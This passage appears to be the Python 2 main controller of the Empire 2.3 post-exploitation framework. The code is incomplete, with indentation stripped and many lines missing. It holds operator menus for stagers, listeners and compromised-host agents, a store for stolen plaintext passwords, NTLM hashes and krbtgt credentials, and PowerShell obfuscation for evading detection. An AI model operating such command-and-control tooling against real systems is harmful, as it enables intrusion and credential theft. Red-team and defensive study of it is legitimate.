
3793 lines
142 KiB

The main controller class for Empire.
This is what's launched from ./empire.
Contains the Main, Listener, Agents, Agent, and Module
menu loops.
# make version for Empire
VERSION = "2.3"
from pydispatch import dispatcher
import sys
import cmd
import sqlite3
import os
import hashlib
import time
import fnmatch
import shlex
import pkgutil
import importlib
import base64
# Empire imports
import helpers
import messages
import agents
import listeners
import modules
import stagers
import credentials
import plugins
from zlib_wrapper import compress
from zlib_wrapper import decompress
# custom exceptions used for nested menu navigation
class NavMain(Exception):
Custom exception class used to navigate to the 'main' menu.
class NavAgents(Exception):
Custom exception class used to navigate to the 'agents' menu.
class NavListeners(Exception):
Custom exception class used to navigate to the 'listeners' menu.
class MainMenu(cmd.Cmd):
The main class used by Empire to drive the 'main' menu
displayed when Empire starts.
def __init__(self, args=None):
# globalOptions[optionName] = (value, required, description)
self.globalOptions = {}
# currently active plugins:
# {'pluginName': classObject}
self.loadedPlugins = {}
# empty database object
self.conn = self.database_connect()
# pull out some common configuration information
(self.isroot, self.installPath, self.ipWhiteList, self.ipBlackList, self.obfuscate, self.obfuscateCommand) = helpers.get_config('rootuser, install_path,ip_whitelist,ip_blacklist,obfuscate,obfuscate_command')
# change the default prompt for the user
self.prompt = '(Empire) > '
self.do_help.__func__.__doc__ = '''Displays the help menu.'''
self.doc_header = 'Commands'
dispatcher.connect(self.handle_event, sender=dispatcher.Any)
# Main, Agents, or
self.menu_state = 'Main'
# parse/handle any passed command line arguments
self.args = args
# instantiate the agents, listeners, and stagers objects
self.agents = agents.Agents(self, args=args)
self.credentials = credentials.Credentials(self, args=args)
self.stagers = stagers.Stagers(self, args=args)
self.modules = modules.Modules(self, args=args)
self.listeners = listeners.Listeners(self, args=args)
self.resourceQueue = []
#A hashtable of autruns based on agent language
self.autoRuns = {}
dispatcher.send('[*] Empire starting up...', sender="Empire")
# print the loading menu
def check_root(self):
Check if Empire has been run as root, and alert user.
if os.geteuid() != 0:
if self.isroot:
print "[!] Warning: Running Empire as non-root, after running as root will likely fail to access prior agents!"
while True:
a = raw_input(helpers.color("[>] Are you sure you want to continue (y) or (n): "))
if a.startswith("y"):
if a.startswith("n"):
if os.geteuid() == 0:
if self.isroot:
if not self.isroot:
cur = self.conn.cursor()
cur.execute("UPDATE config SET rootuser = 1")
except Exception as e:
print e
def handle_args(self):
Handle any passed arguments.
if self.args.resource:
resourceFile = self.args.resource[0]
if self.args.listener or self.args.stager:
# if we're displaying listeners/stagers or generating a stager
if self.args.listener:
if self.args.listener == 'list':
activeListeners = self.listeners.activeListeners
targetListener = [l for l in activeListeners if self.args.listener in l[1]]
if targetListener:
targetListener = targetListener[0]
# messages.display_listener_database(targetListener)
# TODO: reimplement this logic
print helpers.color("\n[!] No active listeners with name '%s'\n" % (self.args.listener))
if self.args.stager == 'list':
print "\nStagers:\n"
print " Name Description"
print " ---- -----------"
for stagerName, stager in self.stagers.stagers.iteritems():
print " %s%s" % ('{0: <17}'.format(stagerName), stager.info['Description'])
print "\n"
stagerName = self.args.stager
targetStager = self.stagers.stagers[stagerName]
menu = StagerMenu(self, stagerName)
if self.args.stager_options:
for option in self.args.stager_options:
if '=' not in option:
print helpers.color("\n[!] Invalid option: '%s'" % (option))
print helpers.color("[!] Please use Option=Value format\n")
if self.conn:
# split the passed stager options by = and set the appropriate option
optionName, optionValue = option.split('=')
menu.do_set("%s %s" % (optionName, optionValue))
# generate the stager
except Exception as e:
print e
print helpers.color("\n[!] No current stager with name '%s'\n" % (stagerName))
# shutdown the database connection object
if self.conn:
def shutdown(self):
Perform any shutdown actions.
print "\n" + helpers.color("[!] Shutting down...")
dispatcher.send("[*] Empire shutting down...", sender="Empire")
# enumerate all active servers/listeners and shut them down
# shutdown the database connection object
if self.conn:
def database_connect(self):
Connect to the default database at ./data/empire.db.
# set the database connectiont to autocommit w/ isolation level
self.conn = sqlite3.connect('./data/empire.db', check_same_thread=False)
self.conn.text_factory = str
self.conn.isolation_level = None
return self.conn
except Exception:
print helpers.color("[!] Could not connect to database")
print helpers.color("[!] Please run database_setup.py")
def cmdloop(self):
The main cmdloop logic that handles navigation to other menus.
while True:
if self.menu_state == 'Agents':
elif self.menu_state == 'Listeners':
# display the main title
# get active listeners, agents, and loaded modules
num_agents = self.agents.get_agents_db()
if num_agents:
num_agents = len(num_agents)
num_agents = 0
num_modules = self.modules.modules
if num_modules:
num_modules = len(num_modules)
num_modules = 0
num_listeners = self.listeners.activeListeners
if num_listeners:
num_listeners = len(num_listeners)
num_listeners = 0
print " " + helpers.color(str(num_modules), "green") + " modules currently loaded\n"
print " " + helpers.color(str(num_listeners), "green") + " listeners currently active\n"
print " " + helpers.color(str(num_agents), "green") + " agents currently active\n\n"
if len(self.resourceQueue) > 0:
# handle those pesky ctrl+c's
except KeyboardInterrupt as e:
self.menu_state = "Main"
choice = raw_input(helpers.color("\n[>] Exit? [y/N] ", "red"))
if choice.lower() != "" and choice.lower()[0] == "y":
return True
except KeyboardInterrupt as e:
# exception used to signal jumping to "Main" menu
except NavMain as e:
self.menu_state = "Main"
# exception used to signal jumping to "Agents" menu
except NavAgents as e:
self.menu_state = "Agents"
# exception used to signal jumping to "Listeners" menu
except NavListeners as e:
self.menu_state = "Listeners"
except Exception as e:
print helpers.color("[!] Exception: %s" % (e))
def print_topics(self, header, commands, cmdlen, maxcol):
Print a nicely formatted help menu.
Adapted from recon-ng
if commands:
self.stdout.write("%s\n" % str(header))
if self.ruler:
self.stdout.write("%s\n" % str(self.ruler * len(header)))
for command in commands:
self.stdout.write("%s %s\n" % (command.ljust(17), getattr(self, 'do_' + command).__doc__))
def emptyline(self):
If any empty line is entered, do nothing.
def handle_event(self, signal, sender):
Default event handler.
Signal Senders:
Empire - the main Empire controller (this file)
Agents - the Agents handler
Listeners - the Listeners handler
HttpHandler - the HTTP handler
EmpireServer - the Empire HTTP server
# if --debug X is passed, log out all dispatcher signals
if self.args.debug:
debug_file = open('empire.debug', 'a')
debug_file.write("%s %s : %s\n" % (helpers.get_datetime(), sender, signal))
if self.args.debug == '2':
# if --debug 2, also print the output to the screen
print " %s : %s" % (sender, signal)
# display specific signals from the agents.
if sender == "Agents":
if "[+] Initial agent" in signal:
print helpers.color(signal)
if ("[+] Listener for" in signal) and ("updated to" in signal):
print helpers.color(signal)
elif "[!] Agent" in signal and "exiting" in signal:
print helpers.color(signal)
elif "WARNING" in signal or "attempted overwrite" in signal:
print helpers.color(signal)
elif "on the blacklist" in signal:
print helpers.color(signal)
elif sender == "EmpireServer":
if "[!] Error starting listener" in signal:
print helpers.color(signal)
elif sender == "Listeners":
print helpers.color(signal)
# CMD methods
def do_plugins(self, args):
"List all available and active plugins."
pluginPath = os.path.abspath("plugins")
print(helpers.color("[*] Searching for plugins at {}".format(pluginPath)))
# From walk_packages: "Note that this function must import all packages
# (not all modules!) on the given path, in order to access the __path__
# attribute to find submodules."
pluginNames = [name for _, name, _ in pkgutil.walk_packages([pluginPath])]
numFound = len(pluginNames)
# say how many we found, handling the 1 case
if numFound == 1:
print(helpers.color("[*] {} plugin found".format(numFound)))
print(helpers.color("[*] {} plugins found".format(numFound)))
# if we found any, list them
if numFound > 0:
activePlugins = self.loadedPlugins.keys()
for name in pluginNames:
active = ""
if name in activePlugins:
active = "******"
print("\t" + name + "\t" + active)
print(helpers.color("[*] Use \"plugin <plugin name>\" to load a plugin."))
def do_plugin(self, pluginName):
"Load a plugin file to extend Empire."
pluginPath = os.path.abspath("plugins")
print(helpers.color("[*] Searching for plugins at {}".format(pluginPath)))
# From walk_packages: "Note that this function must import all packages
# (not all modules!) on the given path, in order to access the __path__
# attribute to find submodules."
pluginNames = [name for _, name, _ in pkgutil.walk_packages([pluginPath])]
if pluginName in pluginNames:
print(helpers.color("[*] Plugin {} found.".format(pluginName)))
# 'self' is the mainMenu object
plugins.load_plugin(self, pluginName)
raise Exception("[!] Error: the plugin specified does not exist in {}.".format(pluginPath))
def postcmd(self, stop, line):
if len(self.resourceQueue) > 0:
nextcmd = self.resourceQueue.pop(0)
def default(self, line):
"Default handler."
def do_resource(self, arg):
"Read and execute a list of Empire commands from a file."
def buildQueue(self, resourceFile, autoRun=False):
cmds = []
if os.path.isfile(resourceFile):
with open(resourceFile, 'r') as f:
lines = []
raise Exception("[!] Error: The resource file specified \"%s\" does not exist" % resourceFile)
for lineFull in lines:
line = lineFull.strip()
#ignore lines that start with the comment symbol (#)
if line.startswith("#"):
#read in another resource file
elif line.startswith("resource "):
rf = line.split(' ')[1]
cmds.extend(self.buildQueue(rf, autoRun))
#add noprompt option to execute without user confirmation
elif autoRun and line == "execute":
cmds.append(line + " noprompt")
return cmds
def do_exit(self, line):
"Exit Empire"
raise KeyboardInterrupt
def do_agents(self, line):
"Jump to the Agents menu."
agents_menu = AgentsMenu(self)
except Exception as e:
raise e
def do_listeners(self, line):
"Interact with active listeners."
listener_menu = ListenersMenu(self)
except Exception as e:
raise e
def do_usestager(self, line):
"Use an Empire stager."
parts = line.split(' ')
if parts[0] not in self.stagers.stagers:
print helpers.color("[!] Error: invalid stager module")
elif len(parts) == 1:
stager_menu = StagerMenu(self, parts[0])
elif len(parts) == 2:
listener = parts[1]
if not self.listeners.is_listener_valid(listener):
print helpers.color("[!] Please enter a valid listener name or ID")
self.stagers.set_stager_option('Listener', listener)
stager_menu = StagerMenu(self, parts[0])
print helpers.color("[!] Error in MainMenu's do_userstager()")
except Exception as e:
raise e
def do_usemodule(self, line):
"Use an Empire module."
# Strip asterisks added by MainMenu.complete_usemodule()
line = line.rstrip("*")
if line not in self.modules.modules:
print helpers.color("[!] Error: invalid module")
module_menu = ModuleMenu(self, line)
except Exception as e:
raise e
def do_searchmodule(self, line):
"Search Empire module names/descriptions."
def do_creds(self, line):
"Add/display credentials to/from the database."
filterTerm = line.strip()
if filterTerm == "":
creds = self.credentials.get_credentials()
elif shlex.split(filterTerm)[0].lower() == "add":
# add format: "domain username password <notes> <credType> <sid>
args = shlex.split(filterTerm)[1:]
if len(args) == 3:
domain, username, password = args
if helpers.validate_ntlm(password):
# credtype, domain, username, password, host, sid="", notes=""):
self.credentials.add_credential("hash", domain, username, password, "")
self.credentials.add_credential("plaintext", domain, username, password, "")
elif len(args) == 4:
domain, username, password, notes = args
if helpers.validate_ntlm(password):
self.credentials.add_credential("hash", domain, username, password, "", notes=notes)
self.credentials.add_credential("plaintext", domain, username, password, "", notes=notes)
elif len(args) == 5:
domain, username, password, notes, credType = args
self.credentials.add_credential(credType, domain, username, password, "", notes=notes)
elif len(args) == 6:
domain, username, password, notes, credType, sid = args
self.credentials.add_credential(credType, domain, username, password, "", sid=sid, notes=notes)
print helpers.color("[!] Format is 'add domain username password <notes> <credType> <sid>")
creds = self.credentials.get_credentials()
elif shlex.split(filterTerm)[0].lower() == "remove":
args = shlex.split(filterTerm)[1:]
if len(args) != 1:
print helpers.color("[!] Format is 'remove <credID>/<credID-credID>/all'")
if args[0].lower() == "all":
choice = raw_input(helpers.color("[>] Remove all credentials from the database? [y/N] ", "red"))
if choice.lower() != "" and choice.lower()[0] == "y":
if "," in args[0]:
credIDs = args[0].split(",")
elif "-" in args[0]:
parts = args[0].split("-")
credIDs = [x for x in xrange(int(parts[0]), int(parts[1]) + 1)]
except Exception:
print helpers.color("[!] Error in remove command parsing.")
print helpers.color("[!] Format is 'remove <credID>/<credID-credID>/all'")
elif shlex.split(filterTerm)[0].lower() == "export":
args = shlex.split(filterTerm)[1:]
if len(args) != 1:
print helpers.color("[!] Please supply an output filename/filepath.")
elif shlex.split(filterTerm)[0].lower() == "plaintext":
creds = self.credentials.get_credentials(credtype="plaintext")
elif shlex.split(filterTerm)[0].lower() == "hash":
creds = self.credentials.get_credentials(credtype="hash")
elif shlex.split(filterTerm)[0].lower() == "krbtgt":
creds = self.credentials.get_krbtgt()
creds = self.credentials.get_credentials(filterTerm=filterTerm)
def do_set(self, line):
"Set a global option (e.g. IP whitelists)."
parts = line.split(' ')
if len(parts) == 1:
print helpers.color("[!] Please enter 'IP,IP-IP,IP/CIDR' or a file path.")
if parts[0].lower() == "ip_whitelist":
if parts[1] != "" and os.path.exists(parts[1]):
open_file = open(parts[1], 'r')
ipData = open_file.read()
self.agents.ipWhiteList = helpers.generate_ip_list(ipData)
except Exception:
print helpers.color("[!] Error opening ip file %s" % (parts[1]))
self.agents.ipWhiteList = helpers.generate_ip_list(",".join(parts[1:]))
elif parts[0].lower() == "ip_blacklist":
if parts[1] != "" and os.path.exists(parts[1]):
open_file = open(parts[1], 'r')
ipData = open_file.read()
self.agents.ipBlackList = helpers.generate_ip_list(ipData)
except Exception:
print helpers.color("[!] Error opening ip file %s" % (parts[1]))
self.agents.ipBlackList = helpers.generate_ip_list(",".join(parts[1:]))
elif parts[0].lower() == "obfuscate":
if parts[1].lower() == "true":
if not helpers.is_powershell_installed():
print helpers.color("[!] PowerShell is not installed and is required to use obfuscation, please install it first.")
self.obfuscate = True
print helpers.color("[*] Obfuscating all future powershell commands run on all agents.")
elif parts[1].lower() == "false":
print helpers.color("[*] Future powershell command run on all agents will not be obfuscated.")
self.obfuscate = False
print helpers.color("[!] Valid options for obfuscate are 'true' or 'false'")
elif parts[0].lower() == "obfuscate_command":
self.obfuscateCommand = parts[1]
print helpers.color("[!] Please choose 'ip_whitelist', 'ip_blacklist', 'obfuscate', or 'obfuscate_command'")
def do_reset(self, line):
"Reset a global option (e.g. IP whitelists)."
if line.strip().lower() == "ip_whitelist":
self.agents.ipWhiteList = None
if line.strip().lower() == "ip_blacklist":
self.agents.ipBlackList = None
def do_show(self, line):
"Show a global option (e.g. IP whitelists)."
if line.strip().lower() == "ip_whitelist":
print self.agents.ipWhiteList
if line.strip().lower() == "ip_blacklist":
print self.agents.ipBlackList
if line.strip().lower() == "obfuscate":
print self.obfuscate
if line.strip().lower() == "obfuscate_command":
print self.obfuscateCommand
def do_load(self, line):
"Loads Empire modules from a non-standard folder."
if line.strip() == '' or not os.path.isdir(line.strip()):
print helpers.color("[!] Please specify a valid folder to load modules from.")
def do_reload(self, line):
"Reload one (or all) Empire modules."
if line.strip().lower() == "all":
# reload all modules
print "\n" + helpers.color("[*] Reloading all modules.") + "\n"
elif os.path.isdir(line.strip()):
# if we're loading an external directory
if line.strip() not in self.modules.modules:
print helpers.color("[!] Error: invalid module")
print "\n" + helpers.color("[*] Reloading module: " + line) + "\n"
def do_list(self, line):
"Lists active agents or listeners."
parts = line.split(' ')
if parts[0].lower() == 'agents':
line = ' '.join(parts[1:])
allAgents = self.agents.get_agents_db()
if line.strip().lower() == 'stale':
agentsToDisplay = []
for agent in allAgents:
# max check in -> delay + delay*jitter
intervalMax = (agent['delay'] + agent['delay'] * agent['jitter']) + 30
# get the agent last check in time
agentTime = time.mktime(time.strptime(agent['lastseen_time'], "%Y-%m-%d %H:%M:%S"))
if agentTime < time.mktime(time.localtime()) - intervalMax:
# if the last checkin time exceeds the limit, remove it
elif line.strip() != '':
# if we're listing an agents active in the last X minutes
minutes = int(line.strip())
# grab just the agents active within the specified window (in minutes)
agentsToDisplay = []
for agent in allAgents:
agentTime = time.mktime(time.strptime(agent['lastseen_time'], "%Y-%m-%d %H:%M:%S"))
if agentTime > time.mktime(time.localtime()) - (int(minutes) * 60):
except Exception:
print helpers.color("[!] Please enter the minute window for agent checkin.")
elif parts[0].lower() == 'listeners':
def do_interact(self, line):
"Interact with a particular agent."
name = line.strip()
sessionID = self.agents.get_agent_id_db(name)
if sessionID and sessionID != '' and sessionID in self.agents.agents:
AgentMenu(self, sessionID)
print helpers.color("[!] Please enter a valid agent name")
def do_preobfuscate(self, line):
"Preobfuscate PowerShell module_source files"
if not helpers.is_powershell_installed():
print helpers.color("[!] PowerShell is not installed and is required to use obfuscation, please install it first.")
module = line.strip()
obfuscate_all = False
obfuscate_confirmation = False
reobfuscate = False
# Preobfuscate ALL module_source files
if module == "" or module == "all":
choice = raw_input(helpers.color("[>] Preobfuscate all PowerShell module_source files using obfuscation command: \"" + self.obfuscateCommand + "\"?\nThis may take a substantial amount of time. [y/N] ", "red"))
if choice.lower() != "" and choice.lower()[0] == "y":
obfuscate_all = True
obfuscate_confirmation = True
choice = raw_input(helpers.color("[>] Force reobfuscation of previously obfuscated modules? [y/N] ", "red"))
if choice.lower() != "" and choice.lower()[0] == "y":
reobfuscate = True
# Preobfuscate a selected module_source file
module_source_fullpath = self.installPath + 'data/module_source/' + module
if not os.path.isfile(module_source_fullpath):
print helpers.color("[!] The module_source file:" + module_source_fullpath + " does not exist.")
choice = raw_input(helpers.color("[>] Preobfuscate the module_source file: " + module + " using obfuscation command: \"" + self.obfuscateCommand + "\"? [y/N] ", "red"))
if choice.lower() != "" and choice.lower()[0] == "y":
obfuscate_confirmation = True
choice = raw_input(helpers.color("[>] Force reobfuscation of previously obfuscated modules? [y/N] ", "red"))
if choice.lower() != "" and choice.lower()[0] == "y":
reobfuscate = True
# Perform obfuscation
if obfuscate_confirmation:
if obfuscate_all:
files = [file for file in helpers.get_module_source_files()]
files = [self.installPath + 'data/module_source/' + module]
for file in files:
file = self.installPath + file
if reobfuscate or not helpers.is_obfuscated(file):
print helpers.color("[*] Obfuscating " + os.path.basename(file) + "...")
print helpers.color("[*] " + os.path.basename(file) + " was already obfuscated. Not reobfuscating.")
helpers.obfuscate_module(file, self.obfuscateCommand, reobfuscate)
def complete_usemodule(self, text, line, begidx, endidx, language=None):
"Tab-complete an Empire module path."
module_names = self.modules.modules.keys()
# suffix each module requiring elevated context with '*'
for module_name in module_names:
if self.modules.modules[module_name].info['NeedsAdmin']:
module_names[module_names.index(module_name)] = (module_name+"*")
# handle modules without a NeedAdmins info key
except KeyError:
if language:
module_names = [ (module_name[len(language)+1:]) for module_name in module_names if module_name.startswith(language)]
mline = line.partition(' ')[2]
offs = len(mline) - len(text)
module_names = [s[offs:] for s in module_names if s.startswith(mline)]
return module_names
def complete_reload(self, text, line, begidx, endidx):
"Tab-complete an Empire PowerShell module path."
module_names = self.modules.modules.keys() + ["all"]
mline = line.partition(' ')[2]
offs = len(mline) - len(text)
return [s[offs:] for s in module_names if s.startswith(mline)]
def complete_usestager(self, text, line, begidx, endidx):
"Tab-complete an Empire stager module path."
stagerNames = self.stagers.stagers.keys()
if line.split(' ')[1].lower() in stagerNames:
listenerNames = self.listeners.get_listener_names()
endLine = ' '.join(line.split(' ')[1:])
mline = endLine.partition(' ')[2]
offs = len(mline) - len(text)
return [s[offs:] for s in listenerNames if s.startswith(mline)]
# otherwise tab-complate the stager names
mline = line.partition(' ')[2]
offs = len(mline) - len(text)
return [s[offs:] for s in stagerNames if s.startswith(mline)]
def complete_setlist(self, text, line, begidx, endidx):
"Tab-complete a global list option"
options = ["listeners", "agents"]
if line.split(' ')[1].lower() in options:
return helpers.complete_path(text, line, arg=True)
mline = line.partition(' ')[2]
offs = len(mline) - len(text)
return [s[offs:] for s in options if s.startswith(mline)]
def complete_set(self, text, line, begidx, endidx):
"Tab-complete a global option."
options = ["ip_whitelist", "ip_blacklist", "obfuscate", "obfuscate_command"]
if line.split(' ')[1].lower() in options:
return helpers.complete_path(text, line, arg=True)
mline = line.partition(' ')[2]
offs = len(mline) - len(text)
return [s[offs:] for s in options if s.startswith(mline)]
def complete_load(self, text, line, begidx, endidx):
"Tab-complete a module load path."
return helpers.complete_path(text, line)
def complete_reset(self, text, line, begidx, endidx):
"Tab-complete a global option."
return self.complete_set(text, line, begidx, endidx)
def complete_show(self, text, line, begidx, endidx):
"Tab-complete a global option."
return self.complete_set(text, line, begidx, endidx)
def complete_creds(self, text, line, begidx, endidx):
"Tab-complete 'creds' commands."
commands = ["add", "remove", "export", "hash", "plaintext", "krbtgt"]
mline = line.partition(' ')[2]
offs = len(mline) - len(text)
return [s[offs:] for s in commands if s.startswith(mline)]
def complete_interact(self, text, line, begidx, endidx):
"Tab-complete an interact command"
names = self.agents.get_agent_names_db()
mline = line.partition(' ')[2]
offs = len(mline) - len(text)
return [s[offs:] for s in names if s.startswith(mline)]
def complete_list(self, text, line, begidx, endidx):
"Tab-complete list"
return self.complete_setlist(text, line, begidx, endidx)
def complete_preobfuscate(self, text, line, begidx, endidx):
"Tab-complete an interact command"
options = [ (option[len('data/module_source/'):]) for option in helpers.get_module_source_files() ]
mline = line.partition(' ')[2]
offs = len(mline) - len(text)
return [s[offs:] for s in options if s.startswith(mline)]
class SubMenu(cmd.Cmd):
def __init__(self, mainMenu):
self.mainMenu = mainMenu
def cmdloop(self):
if len(self.mainMenu.resourceQueue) > 0:
def emptyline(self):
def postcmd(self, stop, line):
if line == "back":
return True
if len(self.mainMenu.resourceQueue) > 0:
nextcmd = self.mainMenu.resourceQueue.pop(0)
if nextcmd == "lastautoruncmd":
raise Exception("endautorun")
def do_back(self, line):
"Go back a menu."
return True
def do_listeners(self, line):
"Jump to the listeners menu."
raise NavListeners()
def do_agents(self, line):
"Jump to the agents menu."
raise NavAgents()
def do_main(self, line):
"Go back to the main menu."
raise NavMain()
def do_resource(self, arg):
"Read and execute a list of Empire commands from a file."
def do_exit(self, line):
"Exit Empire."
raise KeyboardInterrupt
def do_creds(self, line):
"Display/return credentials from the database."
# print a nicely formatted help menu
# stolen/adapted from recon-ng
def print_topics(self, header, commands, cmdlen, maxcol):
if commands:
self.stdout.write("%s\n" % str(header))
if self.ruler:
self.stdout.write("%s\n" % str(self.ruler * len(header)))
for command in commands:
self.stdout.write("%s %s\n" % (command.ljust(17), getattr(self, 'do_' + command).__doc__))
# def preloop(self):
# traceback.print_stack()
class AgentsMenu(SubMenu):
The main class used by Empire to drive the 'agents' menu.
def __init__(self, mainMenu):
SubMenu.__init__(self, mainMenu)
self.doc_header = 'Commands'
# set the prompt text
self.prompt = '(Empire: ' + helpers.color("agents", color="blue") + ') > '
def do_back(self, line):
"Go back to the main menu."
raise NavMain()
def do_autorun(self, line):
"Read and execute a list of Empire commands from a file and execute on each new agent \"autorun <resource file> <agent language>\" e.g. \"autorun /root/ps.rc powershell\". Or clear any autorun setting with \"autorun clear\" and show current autorun settings with \"autorun show\""
line = line.strip()
if not line:
print helpers.color("[!] You must specify a resource file, show or clear. e.g. 'autorun /root/res.rc powershell' or 'autorun clear'")
cmds = line.split(' ')
resourceFile = cmds[0]
language = None
if len(cmds) > 1:
language = cmds[1].lower()
elif not resourceFile == "show" and not resourceFile == "clear":
print helpers.color("[!] You must specify the agent language to run this module on. e.g. 'autorun /root/res.rc powershell' or 'autorun /root/res.rc python'")
#show the current autorun settings by language or all
if resourceFile == "show":
if language:
if self.mainMenu.autoRuns.has_key(language):
print self.mainMenu.autoRuns[language]
print "No autorun commands for language %s" % language
print self.mainMenu.autoRuns
#clear autorun settings by language or all
elif resourceFile == "clear":
if language and not language == "all":
if self.mainMenu.autoRuns.has_key(language):
print "No autorun commands for language %s" % language
#clear all autoruns
#read in empire commands from the specified resource file
self.mainMenu.autoRuns[language] = self.mainMenu.buildQueue(resourceFile, True)
def do_list(self, line):
"Lists all active agents (or listeners)."
if line.lower().startswith("listeners"):
self.mainMenu.do_list("listeners " + str(' '.join(line.split(' ')[1:])))
elif line.lower().startswith("agents"):
self.mainMenu.do_list("agents " + str(' '.join(line.split(' ')[1:])))
self.mainMenu.do_list("agents " + str(line))
def do_rename(self, line):
"Rename a particular agent."
parts = line.strip().split(' ')
# name sure we get an old name and new name for the agent
if len(parts) == 2:
# replace the old name with the new name
self.mainMenu.agents.rename_agent(parts[0], parts[1])
print helpers.color("[!] Please enter an agent name and new name")
def do_interact(self, line):
"Interact with a particular agent."
name = line.strip()
sessionID = self.mainMenu.agents.get_agent_id_db(name)
if sessionID and sessionID != '' and sessionID in self.mainMenu.agents.agents:
AgentMenu(self.mainMenu, sessionID)
print helpers.color("[!] Please enter a valid agent name")
def do_kill(self, line):
"Task one or more agents to exit."
name = line.strip()
if name.lower() == 'all':
choice = raw_input(helpers.color('[>] Kill all agents? [y/N] ', 'red'))
if choice.lower() != '' and choice.lower()[0] == 'y':
allAgents = self.mainMenu.agents.get_agents_db()
for agent in allAgents:
sessionID = agent['session_id']
self.mainMenu.agents.add_agent_task_db(sessionID, 'TASK_EXIT')
except KeyboardInterrupt:
print ''
choice = raw_input(helpers.color("[>] Kill agent '%s'? [y/N] " % (name), 'red'))
# extract the sessionID and clear the agent tasking
sessionID = self.mainMenu.agents.get_agent_id_db(name)
if sessionID and len(sessionID) != 0:
self.mainMenu.agents.add_agent_task_db(sessionID, 'TASK_EXIT')
print helpers.color("[!] Invalid agent name")
except KeyboardInterrupt:
print ''
def do_clear(self, line):
"Clear one or more agent's taskings."
name = line.strip()
if name.lower() == 'all':
elif name.lower() == 'autorun':
# extract the sessionID and clear the agent tasking
sessionID = self.mainMenu.agents.get_agent_id_db(name)
if sessionID and len(sessionID) != 0:
print helpers.color("[!] Invalid agent name")
def do_sleep(self, line):
"Task one or more agents to 'sleep [agent/all] interval [jitter]'"
parts = line.strip().split(' ')
if len(parts) == 1:
print helpers.color("[!] Please enter 'interval [jitter]'")
elif parts[0].lower() == 'all':
delay = parts[1]
jitter = 0.0
if len(parts) == 3:
jitter = parts[2]
allAgents = self.mainMenu.agents.get_agents_db()
for agent in allAgents:
sessionID = agent['session_id']
# update this agent info in the database
self.mainMenu.agents.set_agent_field_db('delay', delay, sessionID)
self.mainMenu.agents.set_agent_field_db('jitter', jitter, sessionID)
# task the agent
self.mainMenu.agents.add_agent_task_db(sessionID, 'TASK_SHELL', 'Set-Delay ' + str(delay) + ' ' + str(jitter))
# update the agent log
msg = "Tasked agent to delay sleep/jitter %s/%s" % (delay, jitter)
self.mainMenu.agents.save_agent_log(sessionID, msg)
# extract the sessionID and clear the agent tasking
sessionID = self.mainMenu.agents.get_agent_id_db(parts[0])
delay = parts[1]
jitter = 0.0
if len(parts) == 3:
jitter = parts[2]
if sessionID and len(sessionID) != 0:
# update this agent's information in the database
self.mainMenu.agents.set_agent_field_db('delay', delay, sessionID)
self.mainMenu.agents.set_agent_field_db('jitter', jitter, sessionID)
self.mainMenu.agents.add_agent_task_db(sessionID, 'TASK_SHELL', 'Set-Delay ' + str(delay) + ' ' + str(jitter))
# update the agent log
msg = "Tasked agent to delay sleep/jitter %s/%s" % (delay, jitter)
self.mainMenu.agents.save_agent_log(sessionID, msg)
print helpers.color("[!] Invalid agent name")
def do_lostlimit(self, line):
"Task one or more agents to 'lostlimit [agent/all] [number of missed callbacks] '"
parts = line.strip().split(' ')
if len(parts) == 1:
print helpers.color("[!] Usage: 'lostlimit [agent/all] [number of missed callbacks]")
elif parts[0].lower() == 'all':
lostLimit = parts[1]
allAgents = self.mainMenu.agents.get_agents_db()
for agent in allAgents:
sessionID = agent['session_id']
# update this agent info in the database
self.mainMenu.agents.set_agent_field_db('lost_limit', lostLimit, sessionID)
# task the agent
self.mainMenu.agents.add_agent_task_db(sessionID, 'TASK_SHELL', 'Set-LostLimit ' + str(lostLimit))
# update the agent log
msg = "Tasked agent to change lost limit %s" % (lostLimit)
self.mainMenu.agents.save_agent_log(sessionID, msg)
# extract the sessionID and clear the agent tasking
sessionID = self.mainMenu.agents.get_agent_id_db(parts[0])
lostLimit = parts[1]
if sessionID and len(sessionID) != 0:
# update this agent's information in the database
self.mainMenu.agents.set_agent_field_db('lost_limit', lostLimit, sessionID)
self.mainMenu.agents.add_agent_task_db(sessionID, 'TASK_SHELL', 'Set-LostLimit ' + str(lostLimit))
# update the agent log
msg = "Tasked agent to change lost limit %s" % (lostLimit)
self.mainMenu.agents.save_agent_log(sessionID, msg)
print helpers.color("[!] Invalid agent name")
def do_killdate(self, line):
"Set the killdate for one or more agents (killdate [agent/all] 01/01/2016)."
parts = line.strip().split(' ')
if len(parts) == 1:
print helpers.color("[!] Usage: 'killdate [agent/all] [01/01/2016]'")
elif parts[0].lower() == 'all':
date = parts[1]
allAgents = self.mainMenu.agents.get_agents_db()
for agent in allAgents:
sessionID = agent['session_id']
# update this agent's field in the database
self.mainMenu.agents.set_agent_field_db('kill_date', date, sessionID)
# task the agent
self.mainMenu.agents.add_agent_task_db(sessionID, 'TASK_SHELL', "Set-KillDate " + str(date))
msg = "Tasked agent to set killdate to " + str(date)
self.mainMenu.agents.save_agent_log(sessionID, msg)
# extract the sessionID and clear the agent tasking
sessionID = self.mainMenu.agents.get_agent_id_db(parts[0])
date = parts[1]
if sessionID and len(sessionID) != 0:
# update this agent's field in the database
self.mainMenu.agents.set_agent_field_db('kill_date', date, sessionID)
# task the agent
self.mainMenu.agents.add_agent_task_db(sessionID, 'TASK_SHELL', "Set-KillDate " + str(date))
# update the agent log
msg = "Tasked agent to set killdate to " + str(date)
self.mainMenu.agents.save_agent_log(sessionID, msg)
print helpers.color("[!] Invalid agent name")
def do_workinghours(self, line):
"Set the workinghours for one or more agents (workinghours [agent/all] 9:00-17:00)."
parts = line.strip().split(' ')
if len(parts) == 1:
print helpers.color("[!] Usage: 'workinghours [agent/all] [9:00-17:00]'")
elif parts[0].lower() == 'all':
hours = parts[1]
hours = hours.replace(',', '-')
allAgents = self.mainMenu.agents.get_agents_db()
for agent in allAgents:
sessionID = agent['session_id']
# update this agent's field in the database
self.mainMenu.agents.set_agent_field_db('working_hours', hours, sessionID)
# task the agent
self.mainMenu.agents.add_agent_task_db(sessionID, 'TASK_SHELL', "Set-WorkingHours " + str(hours))
msg = "Tasked agent to set working hours to %s" % (hours)
self.mainMenu.agents.save_agent_log(sessionID, msg)
# extract the sessionID and clear the agent tasking
sessionID = self.mainMenu.agents.get_agent_id_db(parts[0])
hours = parts[1]
hours = hours.replace(",", "-")
if sessionID and len(sessionID) != 0:
# update this agent's field in the database
self.mainMenu.agents.set_agent_field_db('working_hours', hours, sessionID)
# task the agent
